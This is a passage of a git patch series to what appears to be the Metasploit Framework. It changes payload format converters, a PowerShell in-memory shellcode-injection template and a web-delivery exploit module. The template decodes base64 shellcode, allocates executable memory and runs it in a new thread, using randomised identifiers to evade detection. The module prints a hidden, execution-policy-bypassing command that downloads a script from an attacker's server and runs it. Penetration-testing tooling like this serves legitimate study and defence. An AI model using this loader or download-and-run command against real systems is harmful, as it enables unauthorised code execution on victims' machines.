to_solaris_x86_elf(framework, code, exeopts) + end + end - when 'macho' - output = case arch - when ARCH_X86,nil then to_osx_x86_macho(framework, code, exeopts) - when ARCH_X86_64 then to_osx_x64_macho(framework, code, exeopts) - when ARCH_X64 then to_osx_x64_macho(framework, code, exeopts) - when ARCH_ARMLE then to_osx_arm_macho(framework, code, exeopts) - when ARCH_PPC then to_osx_ppc_macho(framework, code, exeopts) - end + when 'macho' + output = case arch + when ARCH_X86,nil then to_osx_x86_macho(framework, code, exeopts) + when ARCH_X86_64 then to_osx_x64_macho(framework, code, exeopts) + when ARCH_X64 then to_osx_x64_macho(framework, code, exeopts) + when ARCH_ARMLE then to_osx_arm_macho(framework, code, exeopts) + when ARCH_PPC then to_osx_ppc_macho(framework, code, exeopts) + end - when 'vba' - output = Msf::Util::EXE.to_vba(framework, code, exeopts) + when 'vba' + output = Msf::Util::EXE.to_vba(framework, code, exeopts) - when 'vba-exe' - exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) - output = Msf::Util::EXE.to_exe_vba(exe) + when 'vba-exe' + exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) + output = Msf::Util::EXE.to_exe_vba(exe) - when 'vbs' - exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) - output = Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => false })) + when 'vbs' + exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) + output = Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => false })) - when 'loop-vbs' - exe = exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) - output = Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => true })) + when 'loop-vbs' + exe = exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) + output = Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => true })) - when 'war' - arch ||= [ ARCH_X86 ] - tmp_plat = plat.platforms if plat - tmp_plat ||= Msf::Module::PlatformList.transform('win') - exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, code, exeopts) - output = Msf::Util::EXE.to_jsp_war(exe) + when 'war' + arch ||= [ ARCH_X86 ] + tmp_plat = plat.platforms if plat + tmp_plat ||= Msf::Module::PlatformList.transform('win') + exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, code, exeopts) + output = Msf::Util::EXE.to_jsp_war(exe) - when 'psh' - output = Msf::Util::EXE.to_win32pe_psh(framework, code, exeopts) + when 'psh' + output = Msf::Util::EXE.to_win32pe_psh(framework, code, exeopts) - when 'psh-net' - output = Msf::Util::EXE.to_win32pe_psh_net(framework, code, exeopts) - - when 'psh-reflection' - output = Msf::Util::EXE.to_win32pe_psh_reflection(framework, code, exeopts) + when 'psh-net' + output = Msf::Util::EXE.to_win32pe_psh_net(framework, code, exeopts) + + when 'psh-reflection' + output = Msf::Util::EXE.to_win32pe_psh_reflection(framework, code, exeopts) - end + end - output - end + output + end - def self.to_executable_fmt_formats - [ - 'dll','exe','exe-service','exe-small','exe-only','elf','macho','vba','vba-exe', - 'vbs','loop-vbs','asp','aspx','war','psh','psh-net', 'psh-reflection' - ] - end + def self.to_executable_fmt_formats + [ + 'dll','exe','exe-service','exe-small','exe-only','elf','macho','vba','vba-exe', + 'vbs','loop-vbs','asp','aspx','war','psh','psh-net', 'psh-reflection' + ] + end - # - # EICAR Canary: https://www.metasploit.com/redmine/projects/framework/wiki/EICAR - # - def self.is_eicar_corrupted? - path = ::File.expand_path(::File.join(::File.dirname(__FILE__), "..", "..", "..", "data", "eicar.com")) - return true if not ::File.exists?(path) + # + # EICAR Canary: https://www.metasploit.com/redmine/projects/framework/wiki/EICAR + # + def self.is_eicar_corrupted? + path = ::File.expand_path(::File.join(::File.dirname(__FILE__), "..", "..", "..", "data", "eicar.com")) + return true if not ::File.exists?(path) - begin - data = ::File.read(path) - if Digest::SHA1.hexdigest(data) != "3395856ce81f2b7382dee72602f798b642f14140" - return true - end + begin + data = ::File.read(path) + if Digest::SHA1.hexdigest(data) != "3395856ce81f2b7382dee72602f798b642f14140" + return true + end - rescue ::Exception - return true - end + rescue ::Exception + return true + end - false - end + false + end end end From 0a2917685585f5ad2738dfc68896cb968576d8ff Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 09:08:01 +0000 Subject: [PATCH 05/13] Update psh_web_delivery for reflection --- LICENSE | 6 +++++- .../scripts/to_mem_pshreflection.ps1.template | 5 +---- lib/msf/util/exe.rb | 13 ++++++++----- modules/exploits/windows/misc/psh_web_delivery.rb | 4 ++-- 4 files changed, 16 insertions(+), 12 deletions(-) diff --git a/LICENSE b/LICENSE index acb2f21eca..768247fb50 100644 --- a/LICENSE +++ b/LICENSE @@ -15,8 +15,12 @@ License: BSD-3-clause # Last updated: 2013-Nov-04 # +Files: data/templates/to_mem_pshreflection.ps1.template +Copyright: 2012, Matthew Graeber +License: BSD-3-clause + Files: data/john/* -Copyright: 1996-2011 Solar Designer. +Copyright: 1996-2011 License: GPL-2 Files: external/pcaprub/* diff --git a/data/templates/scripts/to_mem_pshreflection.ps1.template b/data/templates/scripts/to_mem_pshreflection.ps1.template index c56e66cabe..92ac5dca7f 100644 --- a/data/templates/scripts/to_mem_pshreflection.ps1.template +++ b/data/templates/scripts/to_mem_pshreflection.ps1.template @@ -1,6 +1,3 @@ -#Added a tweaked by shellster -#Originally taken from https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1 - function %{func_get_proc_address} { Param ($%{var_module}, $%{var_procedure}) $%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') @@ -21,7 +18,7 @@ function %{func_get_delegate_type} { return $%{var_type_builder}.CreateType() } -%{shellcode} +[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}") $%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, [math]::max(0x1000, $%{var_code}.Length), 0x40) $%{var_memset} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} msvcrt.dll memset), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32]))) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index e7fd88b376..f5855d2872 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -914,15 +914,17 @@ require 'msf/core/exe/segment_injector' hash_sub[:var_rwx] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_iter] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code]) return read_replace_script_template("to_mem_old.ps1.template", hash_sub).gsub(/(? 'application/octet-stream' }) end @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote url = get_uri() download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" print_status("Run the following command on the target machine:") - print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"") + print_line("powershell.exe -w hidden -nop -ep bypass -noe -c \"#{download_and_run}\"") end end From 637be1bdfabb846b42581222256b639971002f7d Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 09:19:17 +0000 Subject: [PATCH 06/13] Should use RIG --- lib/msf/util/exe.rb | 27 +++++++++++++++------------ 1 file changed, 15 insertions(+), 12 deletions(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index f5855d2872..8af3316d51 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -925,18 +925,21 @@ require 'msf/core/exe/segment_injector' # Originally from PowerSploit # def self.to_win32pe_psh_reflection(framework, code, opts={}) - hash_sub = {} - hash_sub[:func_get_proc_address] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:func_get_delegate_type] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_module] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_procedure] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_unsafe_native_methods] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_parameters] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_return_type] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_type_builder] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_buffer] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_memset] = Rex::Text.rand_text_alpha(rand(8)+8) + # Intialize rig and value names + rig = Rex::RandomIdentifierGenerator.new() + rig.init_var(:func_get_proc_address) + rig.init_var(:func_get_delegate_type) + rig.init_var(:var_code) + rig.init_var(:var_module) + rig.init_var(:var_procedure) + rig.init_var(:var_unsafe_native_methods) + rig.init_var(:var_parameters) + rig.init_var(:var_return_type) + rig.init_var(:var_type_builder) + rig.init_var(:var_buffer) + rig.init_var(:var_memset) + + hash_sub = rig.to_h hash_sub[:b64shellcode] = Rex::Text.encode_base64(code) From ee4766eceb3bdda9cadef4c2ce2fd074c0761fe4 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 09:31:58 +0000 Subject: [PATCH 07/13] Undo psh_web_delivery_changes --- modules/exploits/windows/misc/psh_web_delivery.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/misc/psh_web_delivery.rb b/modules/exploits/windows/misc/psh_web_delivery.rb index 61a7f2bc66..f85d380c6e 100644 --- a/modules/exploits/windows/misc/psh_web_delivery.rb +++ b/modules/exploits/windows/misc/psh_web_delivery.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote def on_request_uri(cli, request) print_status("Delivering Payload") - data = Msf::Util::EXE.to_win32pe_psh_reflection(framework, payload.encoded) + data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) end @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote url = get_uri() download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" print_status("Run the following command on the target machine:") - print_line("powershell.exe -w hidden -nop -ep bypass -noe -c \"#{download_and_run}\"") + print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"") end end From 8dfcc8aa77b0927ef3694d2d82150bc48a93163f Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 12:44:58 +0000 Subject: [PATCH 08/13] WaitForThread --- data/templates/scripts/to_mem_pshreflection.ps1.template | 3 ++- lib/msf/util/exe.rb | 1 + 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/data/templates/scripts/to_mem_pshreflection.ps1.template b/data/templates/scripts/to_mem_pshreflection.ps1.template index 92ac5dca7f..52f9986805 100644 --- a/data/templates/scripts/to_mem_pshreflection.ps1.template +++ b/data/templates/scripts/to_mem_pshreflection.ps1.template @@ -27,4 +27,5 @@ for ($i=0;$i -le ($%{var_code}.Length-1);$i++) { $%{var_memset}.Invoke([IntPtr]($%{var_buffer}.ToInt32()+$i), $%{var_code}[$i], 1) | Out-Null } -[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero) | Out-Null +$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero) | Out-Null +[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xFFFFFFFF) | Out-Null \ No newline at end of file diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 8af3316d51..486076e448 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -938,6 +938,7 @@ require 'msf/core/exe/segment_injector' rig.init_var(:var_type_builder) rig.init_var(:var_buffer) rig.init_var(:var_memset) + rig.init_var(:var_hthread) hash_sub = rig.to_h From 25b84217aca93269e36fc644aa260eef67271cf1 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 12:47:03 +0000 Subject: [PATCH 09/13] Correctly VAlloc --- data/templates/scripts/to_mem_pshreflection.ps1.template | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/data/templates/scripts/to_mem_pshreflection.ps1.template b/data/templates/scripts/to_mem_pshreflection.ps1.template index 52f9986805..95b37d1b6a 100644 --- a/data/templates/scripts/to_mem_pshreflection.ps1.template +++ b/data/templates/scripts/to_mem_pshreflection.ps1.template @@ -20,7 +20,7 @@ function %{func_get_delegate_type} { [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}") -$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, [math]::max(0x1000, $%{var_code}.Length), 0x40) +$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40) $%{var_memset} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} msvcrt.dll memset), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32]))) for ($i=0;$i -le ($%{var_code}.Length-1);$i++) { From deefabb55995840bc0d5ec7ba8d88a7673e2ac44 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 12:50:09 +0000 Subject: [PATCH 10/13] Fix license --- LICENSE | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/LICENSE b/LICENSE index 768247fb50..a8d32ddbce 100644 --- a/LICENSE +++ b/LICENSE @@ -20,7 +20,7 @@ Copyright: 2012, Matthew Graeber License: BSD-3-clause Files: data/john/* -Copyright: 1996-2011 +Copyright: 1996-2011 Solar Designer. License: GPL-2 Files: external/pcaprub/* From 14c0096115a616a0fb51c00f7e6ffbe865825f37 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 13:38:14 +0000 Subject: [PATCH 11/13] Update template Use Copy instead of memset Remove | Out-Null --- .../scripts/to_mem_pshreflection.ps1.template | 10 +++------- lib/msf/util/exe.rb | 1 - 2 files changed, 3 insertions(+), 8 deletions(-) diff --git a/data/templates/scripts/to_mem_pshreflection.ps1.template b/data/templates/scripts/to_mem_pshreflection.ps1.template index 95b37d1b6a..d1a83daf0c 100644 --- a/data/templates/scripts/to_mem_pshreflection.ps1.template +++ b/data/templates/scripts/to_mem_pshreflection.ps1.template @@ -21,11 +21,7 @@ function %{func_get_delegate_type} { [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}") $%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40) -$%{var_memset} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} msvcrt.dll memset), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32]))) +[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length) -for ($i=0;$i -le ($%{var_code}.Length-1);$i++) { - $%{var_memset}.Invoke([IntPtr]($%{var_buffer}.ToInt32()+$i), $%{var_code}[$i], 1) | Out-Null -} - -$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero) | Out-Null -[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xFFFFFFFF) | Out-Null \ No newline at end of file +$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero) +[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null \ No newline at end of file diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 486076e448..3465ab42db 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -937,7 +937,6 @@ require 'msf/core/exe/segment_injector' rig.init_var(:var_return_type) rig.init_var(:var_type_builder) rig.init_var(:var_buffer) - rig.init_var(:var_memset) rig.init_var(:var_hthread) hash_sub = rig.to_h From dd5b66f8271e2047d57dab249c3571783af1f5e7 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 13:42:37 +0000 Subject: [PATCH 12/13] Undo psh net change --- lib/msf/util/exe.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 3465ab42db..01f716427d 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -900,6 +900,7 @@ require 'msf/core/exe/segment_injector' hash_sub[:var_compileParams] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:b64shellcode] = Rex::Text.encode_base64(code) return read_replace_script_template("to_mem_dotnet.ps1.template", hash_sub).gsub(/(? Date: Mon, 16 Dec 2013 13:43:40 +0000 Subject: [PATCH 13/13] Undo psh net change --- lib/msf/util/exe.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 01f716427d..21e39b1906 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -900,7 +900,6 @@ require 'msf/core/exe/segment_injector' hash_sub[:var_compileParams] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:b64shellcode] = Rex::Text.encode_base64(code) return read_replace_script_template("to_mem_dotnet.ps1.template", hash_sub).gsub(/(?